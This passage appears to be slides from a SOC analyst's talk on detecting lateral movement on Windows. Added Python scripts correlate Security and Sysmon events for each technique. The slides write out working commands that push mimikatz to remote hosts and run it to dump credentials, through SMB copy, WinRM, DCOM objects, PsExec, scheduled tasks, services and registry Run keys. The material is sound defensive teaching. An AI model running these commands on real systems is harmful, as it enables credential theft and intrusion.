2. Who Am I
• Senior SOC Analyst @Kaspersky Lab
• SibSAU (Krasnoyarsk) graduate
• Ex- Infosec dept. head
• Ex- Infosec admin
• Ex- System admin
• Twitter @HeirhabarovT
• www.linkedin.com/in/teymur-kheirkhabarov-73490867/
3. What we're going to talk about
• Different ways to launch executables remotely by using compromised credentials and operating system functionality;
• How to detect remotely launched executables with Windows Event and Sysmon logs.
4. Remote file copy over SMB
How
• Copy to autostart locations for execution on login or boot
• Copy to different locations for further execution via WMI, WinRM, PowerShell Remoting, Task Scheduler, Service…
• Programmatically
• Using Explorer
• Using standard console tools:
  • robocopy C:\tools \\pc0002\ADMIN$\users\public mimikatz.exe
  • powershell Copy-Item -Path mimikatz.exe -Destination \\pc0002\C$\users\public
  • cmd /c "copy mimikatz.exe \\pc0002\C$\users\public"
  • xcopy mimikatz.exe "\\pc0002\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Requirements & limitations
• TCP/445 port is accessible on remote host
• Administrative shares are enabled on remote host
5. Remote file copy over SMB – events sequence on destination side
E1. Network logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Administrative share access (Windows EID 5140/5145)
E4. File object access with WriteData or AddFile rights (Windows EID 4663) – if audit and SACL were configured
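The E1–E4 chain above is only useful if the four events are tied back to one logon session; the join key is the Logon ID (TargetLogonId in 4624, SubjectLogonId in the rest). The following correlator is an added example, not code from the deck or its author: it groups constructed 4624/4672/5145/4663 records by logon ID and reports network logons (LogonType 3) that wrote into an administrative share. The share list and the write bits of AccessMask are assumptions spelled out in the code.

```python
"""Correlate the remote-copy-over-SMB chain (4624 -> 4672 -> 5145 -> 4663) on the
destination host by logon ID. Added example; every record below is constructed."""
from collections import defaultdict

ADMIN_SHARES = {"ADMIN$", "C$", "D$"}   # assumption: default administrative shares to watch
WRITE_BITS = 0x2 | 0x4                  # FILE_WRITE_DATA/FILE_ADD_FILE and FILE_APPEND_DATA

# Constructed sample records; a real pipeline would fill these from the EventData XML.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetLogonId": "0x3E7A1", "LogonType": 3,
     "TargetUserName": "dadmin", "IpAddress": "172.16.205.10"},
    {"EventID": 4672, "SubjectLogonId": "0x3E7A1"},
    {"EventID": 5145, "SubjectLogonId": "0x3E7A1", "ShareName": "\\\\*\\C$",
     "RelativeTargetName": "users\\public\\mimikatz.exe", "AccessMask": "0x2"},
    {"EventID": 4663, "SubjectLogonId": "0x3E7A1",
     "ObjectName": "C:\\users\\public\\mimikatz.exe", "AccessMask": "0x2"},
    # Interactive user reading through C$: same share, no network logon, read-only access.
    {"EventID": 4624, "TargetLogonId": "0x4B210", "LogonType": 2,
     "TargetUserName": "alice", "IpAddress": "-"},
    {"EventID": 5145, "SubjectLogonId": "0x4B210", "ShareName": "\\\\*\\C$",
     "RelativeTargetName": "users\\public\\readme.txt", "AccessMask": "0x80"},
]


def logon_id(event):
    """4624 names the new session in TargetLogonId; later events carry it in SubjectLogonId."""
    key = "TargetLogonId" if event["EventID"] == 4624 else "SubjectLogonId"
    return event.get(key)


def group_by_session(events):
    sessions = defaultdict(list)
    for event in events:
        lid = logon_id(event)
        if lid is not None:
            sessions[lid].append(event)
    return sessions


def is_admin_share(share_name):
    # ShareName looks like \\*\C$; keep the last path component.
    return share_name.rsplit("\\", 1)[-1].upper() in ADMIN_SHARES


def grants_write(access_mask):
    return int(access_mask, 16) & WRITE_BITS != 0


def find_remote_copies(events):
    """One finding per network logon session that wrote into an administrative share."""
    findings = []
    for lid, session in group_by_session(events).items():
        logon = next((e for e in session if e["EventID"] == 4624), None)
        if logon is None or logon["LogonType"] != 3:      # E1 must be a network logon
            continue
        share_writes = [e for e in session if e["EventID"] == 5145
                        and is_admin_share(e["ShareName"]) and grants_write(e["AccessMask"])]
        file_writes = [e for e in session if e["EventID"] == 4663
                       and grants_write(e["AccessMask"])]
        if not share_writes and not file_writes:
            continue
        findings.append({
            "logon_id": lid,
            "user": logon["TargetUserName"],
            "source_ip": logon["IpAddress"],
            "privileged": any(e["EventID"] == 4672 for e in session),   # E2 seen
            "files": sorted({e["RelativeTargetName"] for e in share_writes}
                            | {e["ObjectName"] for e in file_writes}),
        })
    return findings


if __name__ == "__main__":
    for f in find_remote_copies(SAMPLE_EVENTS):
        print(f"{f['user']} from {f['source_ip']} (logon {f['logon_id']}, "
              f"privileged={f['privileged']}) wrote: {', '.join(f['files'])}")
```

5145 fires for any share access once Detailed File Share auditing is on; 4663 only appears when Object Access auditing and a SACL on the target directory are configured, which is why the correlator accepts either as the write evidence.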
13. Remote execution via WinRM
How
• Programmatically
• Using Windows Remote Shell (WinRS) tool:
  • winrs -r:pc0002.test.local C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
  • winrs -r:pc0002.test.local -u:dadmin C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
Requirements & limitations
• WinRM is enabled on remote host (disabled by default on client Windows versions)
• TCP/5985 (TCP/5986) port is accessible on remote host
14. Remote execution via WinRM – events sequence on destination side
E1. Network logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. svchost.exe starts WinrsHost.exe (Sysmon EID 1)
E4. WinrsHost.exe starts payload file (Sysmon EID 1)
19. Remote execution via MMC20.Application COM
How
• Programmatically
• Using powershell:
powershell -command "&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Application','pc0002.test.local')); $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt','7')}"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
20. Remote execution via MMC20.Application COM – events sequence on destination side
E1. Network logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. svchost.exe starts mmc.exe (Sysmon EID 1)
E4. mmc.exe starts payload file (Sysmon EID 1)
22. Remote execution via PsExec (& clones, e.g. PaExec)
How
• PsExec:
  • psexec.exe \\pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
• PaExec:
  • paexec.exe \\pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
Requirements & limitations
• ADMIN$ administrative share is enabled on remote host
• TCP/445 port is accessible on remote host
23. Remote execution via PsExec (& clones) – events sequence on destination side
E1. Network logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Copying PSEXESVC.exe to ADMIN$ (Windows EID 5140/5145)
E4. psexesvc service is installed and started (Windows EID 7045/7036)
E5. psexesvc.exe is started by services.exe (Sysmon EID 1)
E6. psexesvc.exe starts payload file (Sysmon EID 1)
E7. Interaction with payload stdin/stdout/stderr via SMB pipes (Windows EID 5145)
28. Hunting: search for executions in network logon sessions (WinRM, WMI, PsExec, PowerShell Remoting, MMC20 COM)
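The hunt named on this slide, and the WinRM, MMC20 and PsExec event sequences before it, all reduce to one join: Sysmon EID 1 carries the LogonId of the session the new process runs in, and Security EID 4624 tells you whether that session is a network logon (LogonType 3). The script below is an added example rather than the author's own query: it performs that join over constructed records and labels each hit by its parent process. The parent-to-technique map is an assumption built from the sequences in this deck (WinrsHost.exe, mmc.exe, psexesvc.exe) plus the standard host processes for WMI (wmiprvse.exe) and PowerShell Remoting (wsmprovhost.exe).

```python
"""Hunt for process creations inside network logon sessions by joining Sysmon EID 1
(LogonId) with Security EID 4624 (TargetLogonId, LogonType 3). Added example: the
records are constructed and PARENT_TECHNIQUE is an assumed mapping, not a rule set
shipped with the deck."""
import ntpath

# Parent process that spawns the payload -> remote execution method it indicates.
PARENT_TECHNIQUE = {
    "winrshost.exe": "WinRM (winrs)",
    "wsmprovhost.exe": "PowerShell Remoting",
    "wmiprvse.exe": "WMI",
    "psexesvc.exe": "PsExec",
    "mmc.exe": "MMC20.Application COM",
}

SAMPLE_SECURITY = [   # constructed 4624 records
    {"EventID": 4624, "TargetLogonId": "0x3E7A1", "LogonType": 3,
     "TargetUserName": "dadmin", "IpAddress": "172.16.205.10"},
    {"EventID": 4624, "TargetLogonId": "0x1A2B3", "LogonType": 2,
     "TargetUserName": "alice", "IpAddress": "-"},
]

SAMPLE_SYSMON = [     # constructed Sysmon EID 1 records (LogonId in Sysmon's lower-case hex)
    {"EventID": 1, "LogonId": "0x3e7a1", "Image": "C:\\Users\\Public\\mimikatz.exe",
     "ParentImage": "C:\\Windows\\System32\\winrshost.exe",
     "CommandLine": "C:\\Users\\Public\\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit"},
    {"EventID": 1, "LogonId": "0x3e7a1", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\mmc.exe",
     "CommandLine": "cmd.exe /c C:\\Users\\Public\\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit"},
    {"EventID": 1, "LogonId": "0x3e7a1", "Image": "C:\\Windows\\System32\\whoami.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "whoami"},
    {"EventID": 1, "LogonId": "0x1a2b3", "Image": "C:\\Windows\\System32\\calc.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "calc.exe"},
]


def norm_logon_id(value):
    """Security writes 0x3E7A1, Sysmon writes 0x3e7a1: compare them as integers."""
    return int(value, 16)


def network_sessions(security_events):
    """Map logon ID -> 4624 record for every network (type 3) logon."""
    return {norm_logon_id(e["TargetLogonId"]): e
            for e in security_events if e["EventID"] == 4624 and e["LogonType"] == 3}


def hunt_network_session_execs(security_events, sysmon_events):
    sessions = network_sessions(security_events)
    findings = []
    for proc in sysmon_events:
        if proc["EventID"] != 1:
            continue
        logon = sessions.get(norm_logon_id(proc["LogonId"]))
        if logon is None:
            continue            # interactive or service session: outside this hunt
        parent = ntpath.basename(proc["ParentImage"]).lower()
        findings.append({
            "image": proc["Image"],
            "command_line": proc["CommandLine"],
            "parent": parent,
            "technique": PARENT_TECHNIQUE.get(
                parent, "unknown (child of a process in a network logon session)"),
            "user": logon["TargetUserName"],
            "source_ip": logon["IpAddress"],
        })
    return findings


if __name__ == "__main__":
    for hit in hunt_network_session_execs(SAMPLE_SECURITY, SAMPLE_SYSMON):
        print(f"[{hit['technique']}] {hit['user']}@{hit['source_ip']}: "
              f"{hit['parent']} -> {hit['image']}")
```

Descendants of the first payload (here whoami.exe under cmd.exe) inherit the session's LogonId, so they surface too even when the parent is not in the map; that is the point of keying on the session rather than on a parent name list. The ShellWindows/ShellBrowserWindow cases covered later in the deck are the exception: the payload is started by explorer.exe in the interactive user's session, so this join does not see them.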
29. Remote execution via ShellWindows COM
How
• Programmatically
• Using powershell:
powershell -command "&{$obj=[activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39','pc0002')); $obj.item().Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:\Windows\System32',$null,0)}"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
30. Remote execution via ShellBrowserWindow COM
How
• Programmatically
• Using powershell:
powershell -command "&{$obj=[activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880','pc0002')); $obj.Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:\Windows\System32',$null,0)}"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
• Doesn't work for Windows 7 destination
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
31. Remote execution via ShellWindows or ShellBrowserWindow COM – events sequence on destination side
E1. Network logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. explorer.exe starts payload file in current session (Sysmon EID 1)
32. Remote execution via ShellWindows or ShellBrowserWindow COM – how to detect???
The payload file is executed in the session of the current active user, not in the network logon session.
33. Remote execution via Scheduled Tasks
How
• Programmatically
• Standard command line tools:
  • at \\172.16.205.14 3:55 C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> win_mimikatz_output.txt
  • schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR "cmd.exe /c C:\users\public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
Requirements & limitations
• TCP/135 port and RPC dynamic port range are accessible on remote host (in case of schtasks usage)
• TCP/445 port is accessible on remote host (in case of AT usage)
34. Remote execution via Scheduled Tasks – events sequence on destination side
E1. Network logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Access to atsvc SMB pipe (Windows EID 5145) – in case of at.exe usage
E4. Scheduled task is created or updated (Windows EID 4698/4702)
E5. Task is triggered. svchost.exe starts taskeng.exe (Sysmon EID 1)
E6. taskeng.exe starts payload file (Sysmon EID 1)
There are also some interesting events in the Microsoft-Windows-TaskScheduler/Operational event log.
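E4 (Security EID 4698) is the richest event in this chain because it embeds the full task definition as XML in its TaskContent field, so the action, the account the task runs as and the trigger type can be examined before the task ever fires. The triage below is an added example, not a query from the deck: it parses the TaskContent of two constructed 4698 records (one mirroring the schtasks command on the previous slide, one benign vendor updater) and scores them. The launcher list, the writable-directory list and the two-indicator threshold are assumptions stated in the code.

```python
"""Triage Security EID 4698 (scheduled task created) by parsing the TaskContent XML the
event carries. Added example; both records are constructed and the indicator rules are
assumptions, not a rule set from the deck."""
import ntpath
import re
import xml.etree.ElementTree as ET

LAUNCHERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
             "rundll32.exe", "regsvr32.exe"}                 # assumption: interpreter launchers
WRITABLE_DIRS = ("c:\\users\\public", "c:\\programdata", "c:\\windows\\temp",
                 "\\appdata\\local\\temp")                   # assumption: user-writable paths

SAMPLE_4698 = {  # constructed; mirrors the schtasks example on the previous slide
    "EventID": 4698, "SubjectUserName": "dadmin", "SubjectLogonId": "0x3E7A1",
    "TaskName": "\\Adobe Update",
    "TaskContent": (
        '<?xml version="1.0" encoding="UTF-16"?>'
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        '<Triggers><TimeTrigger><StartBoundary>2017-10-18T00:57:00</StartBoundary>'
        '</TimeTrigger></Triggers>'
        '<Principals><Principal id="Author"><UserId>S-1-5-18</UserId>'
        '<RunLevel>HighestAvailable</RunLevel></Principal></Principals>'
        '<Actions Context="Author"><Exec><Command>cmd.exe</Command>'
        '<Arguments>/c C:\\users\\public\\mimikatz.exe privilege::debug '
        'sekurlsa::logonpasswords exit &gt;&gt; C:\\Users\\Public\\result.txt</Arguments>'
        '</Exec></Actions></Task>'
    ),
}

SAMPLE_4698_BENIGN = {  # constructed; a routine vendor updater task
    "EventID": 4698, "SubjectUserName": "SYSTEM", "SubjectLogonId": "0x3E7",
    "TaskName": "\\Adobe Acrobat Update Task",
    "TaskContent": (
        '<?xml version="1.0" encoding="UTF-16"?>'
        '<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        '<Triggers><CalendarTrigger><StartBoundary>2017-01-01T09:00:00</StartBoundary>'
        '<ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger>'
        '</Triggers><Principals><Principal id="Author"><UserId>S-1-5-18</UserId>'
        '<RunLevel>LeastPrivilege</RunLevel></Principal></Principals>'
        '<Actions Context="Author"><Exec><Command>"C:\\Program Files (x86)\\Common Files'
        '\\Adobe\\ARM\\1.0\\AdobeARM.exe"</Command></Exec></Actions></Task>'
    ),
}


def parse_task_content(xml_text):
    """Pull action, principal and trigger kinds out of a Task Scheduler XML document."""
    # The event text is already a decoded str; drop the UTF-16 declaration so the
    # parser does not second-guess the encoding.
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)
    root = ET.fromstring(xml_text)
    ns = root.tag[1:root.tag.index("}")] if root.tag.startswith("{") else ""
    q = (lambda tag: f"{{{ns}}}{tag}") if ns else (lambda tag: tag)

    def text(path):
        node = root.find("/".join(q(p) for p in path.split("/")))
        return (node.text or "").strip() if node is not None else ""

    triggers_node = root.find(q("Triggers"))
    triggers = [] if triggers_node is None else [c.tag.split("}")[-1] for c in triggers_node]
    return {
        "command": text("Actions/Exec/Command").strip('"'),
        "arguments": text("Actions/Exec/Arguments"),
        "run_as": text("Principals/Principal/UserId"),
        "run_level": text("Principals/Principal/RunLevel"),
        "triggers": triggers,
    }


def triage_task(event):
    task = parse_task_content(event["TaskContent"])
    reasons = []
    if ntpath.basename(task["command"]).lower() in LAUNCHERS:
        reasons.append("interpreter launcher")
    blob = f"{task['command']} {task['arguments']}".lower()
    if any(d in blob for d in WRITABLE_DIRS):
        reasons.append("binary in user-writable location")
    if task["run_as"] == "S-1-5-18":
        reasons.append("runs as SYSTEM")
    if task["triggers"] == ["TimeTrigger"]:
        reasons.append("one-shot time trigger")
    return {"task": event["TaskName"], "created_by": event["SubjectUserName"],
            "logon_id": event["SubjectLogonId"], **task,
            "reasons": reasons, "suspicious": len(reasons) >= 2}   # assumption: threshold


if __name__ == "__main__":
    for ev in (SAMPLE_4698, SAMPLE_4698_BENIGN):
        r = triage_task(ev)
        print(f"{r['task']!r} by {r['created_by']}: suspicious={r['suspicious']} {r['reasons']}")
```

The SubjectLogonId of the 4698 is the same key used elsewhere in this deck, so a flagged task can be joined back to its 4624 to confirm the creator came in over a network logon; 4702 (task updated) carries the same TaskContent field and can be parsed with the same function.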
39. Remote execution via Services
How
• Programmatically
• Standard command line tool:
  • sc \\pc0002 create "Remote service" binPath= "cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
    sc \\pc0002 start "Remote service"
    sc \\pc0002 delete "Remote service"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
40. Remote execution via Services – events sequence on destination side
E1. Network logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. New service is installed (Windows EID 7045/4697)
E4. Start command is sent to installed service. services.exe starts payload file (Sysmon EID 1)
E5. A timeout is reached (Windows EID 7009)
E6. Failure while trying to start service (Windows EID 7000)
43. Remote registry
How
• Programmatically
• Using powershell or reg:
  • reg add \\pc0002\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v GoogleUpdater /t REG_SZ /d "cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
  • powershell -command "&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine','pc0002'); $key=$reg.OpenSubKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',$True); $key.SetValue('GoogleUpdater','calc.exe');}"
Requirements & limitations
• TCP/445 port is accessible on remote host
• Remote Registry service is enabled on remote host
44. Remote registry – events sequence on destination side
E1. Network logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. WINREG pipe access (Windows EID 5145)
E4. Registry value is modified (Windows EID 4657) – if audit and SACL were configured
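What makes E3 and E4 worth pairing is that the winreg pipe access (5145 on \\*\IPC$) and the value change (4657) share a SubjectLogonId, so a Run-key modification can be attributed to the Remote Registry service rather than to a local process. The script below is an added example, not a detection from the deck: over constructed records it picks out 4657 events on autorun keys and marks those whose session also opened the winreg pipe. The autorun key list is an assumption; the local OneDrive record is there to show a change that is not flagged as remote.

```python
"""Flag autorun (Run/RunOnce) value changes made through the Remote Registry service:
Security EID 4657 (value modified) from a session that also opened the winreg SMB pipe
(EID 5145). Added example; records are constructed and AUTORUN_KEYS is an assumption."""

AUTORUN_KEYS = (
    "\\software\\microsoft\\windows\\currentversion\\run",
    "\\software\\microsoft\\windows\\currentversion\\runonce",
)

SAMPLE_EVENTS = [   # constructed records
    {"EventID": 5145, "SubjectLogonId": "0x3E7A1", "SubjectUserName": "dadmin",
     "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "winreg"},
    {"EventID": 4657, "SubjectLogonId": "0x3E7A1", "SubjectUserName": "dadmin",
     "ObjectName": "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
     "ObjectValueName": "GoogleUpdater",
     "NewValue": "cmd /c C:\\Users\\Public\\mimikatz.exe privilege::debug "
                 "sekurlsa::logonpasswords exit >> C:\\Users\\Public\\result.txt"},
    # A local, interactive user's own autorun entry: same key name, no winreg pipe access.
    {"EventID": 4657, "SubjectLogonId": "0x52C11", "SubjectUserName": "alice",
     "ObjectName": "\\REGISTRY\\USER\\S-1-5-21-1111111111-2222222222-3333333333-1001"
                   "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
     "ObjectValueName": "OneDrive",
     "NewValue": "\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"},
]


def is_autorun_key(object_name):
    name = object_name.lower()
    return any(name.endswith(k) for k in AUTORUN_KEYS)


def winreg_sessions(events):
    """Logon IDs that opened the winreg named pipe over SMB (E3)."""
    return {e["SubjectLogonId"] for e in events
            if e["EventID"] == 5145 and e.get("RelativeTargetName", "").lower() == "winreg"}


def find_autorun_changes(events):
    remote = winreg_sessions(events)
    findings = []
    for e in events:
        if e["EventID"] != 4657 or not is_autorun_key(e["ObjectName"]):
            continue
        findings.append({
            "user": e["SubjectUserName"],
            "logon_id": e["SubjectLogonId"],
            "hive": "HKLM" if e["ObjectName"].upper().startswith("\\REGISTRY\\MACHINE") else "HKU",
            "key": e["ObjectName"],
            "value": e["ObjectValueName"],
            "data": e["NewValue"],
            "via_remote_registry": e["SubjectLogonId"] in remote,   # E3 seen in same session
        })
    return findings


if __name__ == "__main__":
    for f in find_autorun_changes(SAMPLE_EVENTS):
        tag = "REMOTE" if f["via_remote_registry"] else "local"
        print(f"[{tag}] {f['user']} set {f['hive']} ...\\Run\\{f['value']} = {f['data']}")
```

4657 only exists when Object Access auditing for the registry is enabled and a SACL is set on the Run keys, as the slide notes; without it, the 5145 winreg access in a network logon session is the only trace this chain leaves in the Security log.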
50. Remote WMI subscriptions creation – events sequence on destination side
E1. Network logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Writing to WMI namespace (Windows EID 4662) – if audit and SACL were configured